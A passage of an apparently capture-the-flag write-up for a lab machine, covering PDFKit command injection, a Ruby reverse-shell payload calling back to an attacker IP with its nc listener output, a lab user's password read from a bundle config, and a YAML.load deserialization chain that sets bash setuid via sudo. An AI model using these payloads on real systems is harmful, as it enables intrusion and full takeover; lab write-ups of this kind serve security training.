&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">PDFKit&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>new(&lt;span style="color:#b8bb26">&amp;#34;http://example.com/?name=&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>params&lt;span style="color:#fe8019">[&lt;/span>&lt;span style="color:#83a598">:name&lt;/span>&lt;span style="color:#fe8019">]&lt;/span>&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>)&lt;span style="color:#fe8019">.&lt;/span>to_pdf
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>If the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span>irb(main):&lt;span style="color:#d3869b">060&lt;/span>:&lt;span style="color:#d3869b">0&lt;/span>&lt;span style="color:#fe8019">&amp;gt;&lt;/span> &lt;span style="color:#fabd2f">puts&lt;/span> &lt;span style="color:#d3869b">PDFKit&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>new(&lt;span style="color:#b8bb26">&amp;#34;http://example.com/?name=&lt;/span>&lt;span style="color:#b8bb26">#{&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;%20`sleep 5`&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>)&lt;span style="color:#fe8019">.&lt;/span>command
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wkhtmltopdf &lt;span style="color:#fe8019">--&lt;/span>quiet &lt;span style="color:#fe8019">[...]&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;http://example.com/?name=%20`sleep 5`&amp;#34;&lt;/span> &lt;span style="color:#fe8019">-&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#fe8019">nil&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Calling &lt;code>to_pdf&lt;/code> on the instance shows that the &lt;code>sleep&lt;/code> command is indeed executing:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span>PDFKit.new(&amp;#34;http://example.com/?name=#{&amp;#39;%20`sleep 5`&amp;#39;}&amp;#34;).to_pdf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span># 5 seconds wait...
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Of course, if the user can control completely the first argument of the PDFKit constructor, they can also exploit the command injection as long as it starts with &amp;ldquo;http&amp;rdquo;:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span>PDFKit.new(&amp;#34;http%20`sleep 5`&amp;#34;).to_pdf
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>So we can add a reverse shell and gain initial access.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Payload&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>http://example.com/?name&lt;span style="color:#fe8019">={&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;%20`ruby -rsocket -e&amp;#39;&lt;/span>spawn&lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;sh&amp;#34;&lt;/span>,&lt;span style="color:#fe8019">[&lt;/span>:in,:out,:err&lt;span style="color:#fe8019">]=&lt;/span>&amp;gt;TCPSocket.new&lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;10.10.14.10&amp;#34;&lt;/span>,1234&lt;span style="color:#fe8019">))&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;`&amp;#39;&lt;/span>&lt;span style="color:#fe8019">}&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># nc listener&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> nc -lnvp &lt;span style="color:#d3869b">1234&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Listening on 0.0.0.0 &lt;span style="color:#d3869b">1234&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Connection received on 10.10.11.189 &lt;span style="color:#d3869b">46174&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ruby
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>1001&lt;span style="color:#fe8019">(&lt;/span>ruby&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>1001&lt;span style="color:#fe8019">(&lt;/span>ruby&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>1001&lt;span style="color:#fe8019">(&lt;/span>ruby&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h1 id="lateral-movement-to-henry">Lateral Movement to &lt;code>henry&lt;/code>&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">cd&lt;/span> ~
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ls -alp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>total &lt;span style="color:#d3869b">28&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">4&lt;/span> ruby ruby &lt;span style="color:#d3869b">4096&lt;/span> Jan &lt;span style="color:#d3869b">19&lt;/span> 00:50 ./
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">4&lt;/span> root root &lt;span style="color:#d3869b">4096&lt;/span> Oct &lt;span style="color:#d3869b">26&lt;/span> 08:28 ../
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>lrwxrwxrwx &lt;span style="color:#d3869b">1&lt;/span> root root &lt;span style="color:#d3869b">9&lt;/span> Oct &lt;span style="color:#d3869b">26&lt;/span> 07:53 .bash_history -&amp;gt; /dev/null
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-rw-r--r-- &lt;span style="color:#d3869b">1&lt;/span> ruby ruby &lt;span style="color:#d3869b">220&lt;/span> Mar &lt;span style="color:#d3869b">27&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> .bash_logout
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-rw-r--r-- &lt;span style="color:#d3869b">1&lt;/span> ruby ruby &lt;span style="color:#d3869b">3526&lt;/span> Mar &lt;span style="color:#d3869b">27&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> .bashrc
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dr-xr-xr-x &lt;span style="color:#d3869b">2&lt;/span> root ruby &lt;span style="color:#d3869b">4096&lt;/span> Oct &lt;span style="color:#d3869b">26&lt;/span> 08:28 .bundle/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">3&lt;/span> ruby ruby &lt;span style="color:#d3869b">4096&lt;/span> Jan &lt;span style="color:#d3869b">19&lt;/span> 00:50 .cache/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-rw-r--r-- &lt;span style="color:#d3869b">1&lt;/span> ruby ruby &lt;span style="color:#d3869b">807&lt;/span> Mar &lt;span style="color:#d3869b">27&lt;/span> &lt;span style="color:#d3869b">2022&lt;/span> .profile
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ls -alp .bundle
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>total &lt;span style="color:#d3869b">12&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dr-xr-xr-x &lt;span style="color:#d3869b">2&lt;/span> root ruby &lt;span style="color:#d3869b">4096&lt;/span> Oct &lt;span style="color:#d3869b">26&lt;/span> 08:28 ./
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">4&lt;/span> ruby ruby &lt;span style="color:#d3869b">4096&lt;/span> Jan &lt;span style="color:#d3869b">19&lt;/span> 00:50 ../
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-r-xr-xr-x &lt;span style="color:#d3869b">1&lt;/span> root ruby &lt;span style="color:#d3869b">62&lt;/span> Sep &lt;span style="color:#d3869b">26&lt;/span> 05:04 config
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>cat .bundle/config
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>---
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>BUNDLE_HTTPS://RUBYGEMS__ORG/: &lt;span style="color:#b8bb26">&amp;#34;henry:Q3c1AqGHtoI0aXAYFH&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>After some enumeration in the home directory of user &lt;code>ruby&lt;/code> I got the password for user &lt;code>henry&lt;/code>.&lt;/p>
&lt;h2 id="lateral-movement-vector">Lateral Movement vector&lt;/h2>
&lt;p>Now we can either use SSH to login to the user &lt;code>henry&lt;/code> or just use &lt;code>su henry&lt;/code> and enter the password. Though SSH will be the best way because we will get a proper bash shell instead of the restricted nc shell.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> ssh henry@10.10.11.189
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@10.10.11.189s password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Linux precious 5.10.0-19-amd64 &lt;span style="color:#928374;font-style:italic">#1 SMP Debian 5.10.149-2 (2022-10-21) x86_64&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>The programs included with the Debian GNU/Linux system are free software;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>the exact distribution terms &lt;span style="color:#fe8019">for&lt;/span> each program are described in the
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>individual files in /usr/share/doc/*/copyright.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>permitted by applicable law.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:~$ whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:~$ id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>henry&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>henry&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>henry&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:~$
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration-1">Local Enumeration&lt;/h2>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>henry@precious:~$ sudo -l
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Matching Defaults entries &lt;span style="color:#fe8019">for&lt;/span> henry on precious:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> env_reset, mail_badpass, secure_path&lt;span style="color:#fe8019">=&lt;/span>/usr/local/sbin&lt;span style="color:#b8bb26">\:&lt;/span>/usr/local/bin&lt;span style="color:#b8bb26">\:&lt;/span>/usr/sbin&lt;span style="color:#b8bb26">\:&lt;/span>/usr/bin&lt;span style="color:#b8bb26">\:&lt;/span>/sbin&lt;span style="color:#b8bb26">\:&lt;/span>/bin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>User henry may run the following commands on precious:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We can run &lt;code>update_dependencies.rb&lt;/code> script as root.&lt;/p>
&lt;p>&lt;code>update_dependencies.rb&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-ruby" data-lang="ruby">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Compare installed dependencies with those specified in &amp;#34;dependencies.yml&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">require&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;yaml&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">require&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;rubygems&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># TODO: update versions automatically&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">update_gems&lt;/span>()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">list_from_file&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#d3869b">YAML&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>load(&lt;span style="color:#d3869b">File&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>read(&lt;span style="color:#b8bb26">&amp;#34;dependencies.yml&amp;#34;&lt;/span>))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">list_local_gems&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#d3869b">Gem&lt;/span>&lt;span style="color:#fe8019">::&lt;/span>&lt;span style="color:#d3869b">Specification&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>sort_by{ &lt;span style="color:#fe8019">|&lt;/span>g&lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#fe8019">[&lt;/span>g&lt;span style="color:#fe8019">.&lt;/span>name&lt;span style="color:#fe8019">.&lt;/span>downcase, g&lt;span style="color:#fe8019">.&lt;/span>version&lt;span style="color:#fe8019">]&lt;/span> }&lt;span style="color:#fe8019">.&lt;/span>map{&lt;span style="color:#fe8019">|&lt;/span>g&lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#fe8019">[&lt;/span>g&lt;span style="color:#fe8019">.&lt;/span>name, g&lt;span style="color:#fe8019">.&lt;/span>version&lt;span style="color:#fe8019">.&lt;/span>to_s&lt;span style="color:#fe8019">]&lt;/span>}
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>gems_file &lt;span style="color:#fe8019">=&lt;/span> list_from_file
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>gems_local &lt;span style="color:#fe8019">=&lt;/span> list_local_gems
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>gems_file&lt;span style="color:#fe8019">.&lt;/span>each &lt;span style="color:#fe8019">do&lt;/span> &lt;span style="color:#fe8019">|&lt;/span>file_name, file_version&lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> gems_local&lt;span style="color:#fe8019">.&lt;/span>each &lt;span style="color:#fe8019">do&lt;/span> &lt;span style="color:#fe8019">|&lt;/span>local_name, local_version&lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span>(file_name &lt;span style="color:#fe8019">==&lt;/span> local_name)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span>(file_version &lt;span style="color:#fe8019">!=&lt;/span> local_version)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">puts&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Installed version differs from the one specified in file: &amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> local_name
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">else&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">puts&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;Installed version is equals to the one specified in file: &amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> local_name
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">end&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Here we can see that the &lt;code>YAML.load()&lt;/code> function is used to load the &lt;code>dependencies.yaml&lt;/code> file. Apparently this function is vulnerable to RCE by deserialization.&lt;/p>
&lt;h2 id="privilege-escalation-vector">Privilege Escalation vector&lt;/h2>
&lt;ul>
&lt;li>&lt;a href="https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/">Universal RCE with Ruby YAML.load&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565">https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565&lt;/a>&lt;/li>
&lt;/ul>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-yml" data-lang="yml">&lt;span style="display:flex;">&lt;span>---
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>- !ruby/object:Gem::Installer
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">i&lt;/span>: x
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>- !ruby/object:Gem::SpecFetcher
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">i&lt;/span>: &lt;span style="color:#fe8019">y&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>- !ruby/object:Gem::Requirement
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">requirements&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> !ruby/object:Gem::Package::TarReader
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">io&lt;/span>: &lt;span style="color:#8ec07c">&amp;amp;1&lt;/span> !ruby/object:Net::BufferedIO
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">io&lt;/span>: &lt;span style="color:#8ec07c">&amp;amp;1&lt;/span> !ruby/object:Gem::Package::TarReader::Entry
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">read&lt;/span>: &lt;span style="color:#d3869b">0&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">header&lt;/span>: &lt;span style="color:#b8bb26">&amp;#34;abc&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">debug_output&lt;/span>: &lt;span style="color:#8ec07c">&amp;amp;1&lt;/span> !ruby/object:Net::WriteAdapter
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">socket&lt;/span>: &lt;span style="color:#8ec07c">&amp;amp;1&lt;/span> !ruby/object:Gem::RequestSet
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">sets&lt;/span>: !ruby/object:Net::WriteAdapter
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">socket&lt;/span>: !ruby/module &amp;#39;Kernel&amp;#39;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">method_id&lt;/span>: :system
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">git_set&lt;/span>: chmod u+s /usr/bin/bash
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fb4934">method_id&lt;/span>: :resolve
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>henry@precious:~$ &lt;span style="color:#fabd2f">cd&lt;/span> /tmp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:/tmp$ mkdir &lt;span style="color:#fabd2f">test&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:/tmp$ &lt;span style="color:#fabd2f">cd&lt;/span> &lt;span style="color:#fabd2f">test&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:/tmp/test$ nano dependencies.yml
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:/tmp/test$ sudo /usr/bin/ruby /opt/update_dependencies.rb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sh: 1: reading: not found
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Traceback &lt;span style="color:#fe8019">(&lt;/span>most recent call last&lt;span style="color:#fe8019">)&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 33: from /opt/update_dependencies.rb:17:in &lt;span style="color:#b8bb26">`&lt;/span>&amp;lt;main&amp;gt;&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 32: from /opt/update_dependencies.rb:10:in `list_from_file&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 31: from /usr/lib/ruby/2.7.0/psych.rb:279:in &lt;span style="color:#b8bb26">`&lt;/span>load&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in `to_ruby&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in &lt;span style="color:#b8bb26">`&lt;/span>accept&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in &lt;span style="color:#b8bb26">`&lt;/span>visit&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in `visit_Psych_Nodes_Document&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in &lt;span style="color:#b8bb26">`&lt;/span>accept&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 24: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 23: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in &lt;span style="color:#b8bb26">`&lt;/span>visit&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 22: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:141:in `visit_Psych_Nodes_Sequence&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 21: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in &lt;span style="color:#b8bb26">`&lt;/span>register_empty&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 20: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in `each&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 19: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:332:in &lt;span style="color:#b8bb26">`&lt;/span>block in register_empty&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 18: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 17: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in &lt;span style="color:#b8bb26">`&lt;/span>accept&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 16: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit&amp;#39;&lt;/span>
